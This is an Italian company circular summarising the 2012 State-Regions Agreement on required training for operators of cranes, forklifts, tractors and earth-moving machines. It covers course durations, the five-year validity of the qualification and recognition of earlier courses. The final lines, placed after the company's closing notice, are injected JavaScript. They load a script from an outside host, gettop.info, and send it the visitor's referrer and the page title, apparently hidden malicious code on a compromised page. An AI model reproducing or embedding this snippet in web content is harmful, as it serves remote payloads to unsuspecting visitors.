Posted in Circolari, Formazione

La Gazzetta Ufficiale del 12 MAR 2012 ha pubblicato l’Accordo Stato-Regioni per la formazione di cui al titolo della presente. L’Accordo entra in vigore dal 12 MAR 2013.

Le attrezzature per le quali è necessaria l’abilitazione sono:

  • piattaforme mobili elevabili;
  • gru a torre;
  • gru mobile;
  • gru per autocarro;
  • carrelli elevatori semoventi a braccio telescopico;
  • carrelli industriali semoventi: qualsiasi veicolo dotato di ruote (eccetto quelli circolanti su rotaie) concepito per trasportare, trainare, spingere, sollevare, impilare o disporre su scaffalature qualsiasi tipo di carico ed azionato da operatore a bordo su sedile. Ad esempio i carrelli elevatori;
  • trattori agricoli o forestali;
  • macchine movimento terra: escavatori idraulici, escavatori a fune, pale caricatrici frontali, terne, autoribaltabili a cingoli, pompa per calcestruzzo.

I soggetti formatori sono gli Enti accreditati oltre agli Enti nazionali e regionali di pertinenza.

I corsi di formazione prevedono la prova di attività pratica.

L’abilitazione ha durata 5 anni e deve essere rinnovata previa verifica della partecipazione a corso di aggiornamento della durata minima di 4 ore.

Riconoscimento della formazione pregressa. Alla data di entrata in vigore dell’Accordo saranno riconosciuti sia i corsi già effettuati secondo i dettati dell’accordo, sia quelli non corrispondenti ai dettati dell’Accordo (durata inferiore, mancata verifica finale di apprendimento) purché, entro 24 mesi dall’entrata in vigore dell’accordo (entro il 12 MAR 2015) sia impartito il corso di aggiornamento di almeno 4 ore di cui 3 relative agli argomenti dei moduli pratici.
Al fine del riconoscimento del corso effettuato prima dell’entrata in vigore dell’accordo, questo deve essere documentato tramite registro del corso recante: elenco dei partecipanti (con firme), nominativi e firme dei docenti, contenuti, ora di inizio e fine, esiti della valutazione teorica e dell’esercitazione pratica.

Durata del corso: a seconda dell’attrezzatura sono individuate le durate dei corsi.
Per utilizzatori di carrelli industriali semoventi: l’Accordo prevede per i nuovi addetti un corso composto da un modulo giuridico di 1 ora, di un modulo tecnico di 7 ore e di un modulo pratico di 4 ore per la conduzione di carrelli semoventi o semoventi con braccio telescopico o semoventi con braccio telescopico rotativo. In caso di utilizzo di più tipi di carrelli, il modulo pratico è di 8 ore.

La formazione e-Learning è ammessa a condizioni specifiche.

IL PERSONALE DI Qsei s.r.l. E’ A DISPOSIZIONE PER CHIARIMENTI E
PER ASSISTERE LE AZIENDE AD ESPLETARE GLI ADEMPIMENTI NECESSARI

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

d.getElementsByTagName(‘head’)[0].appendChild(s);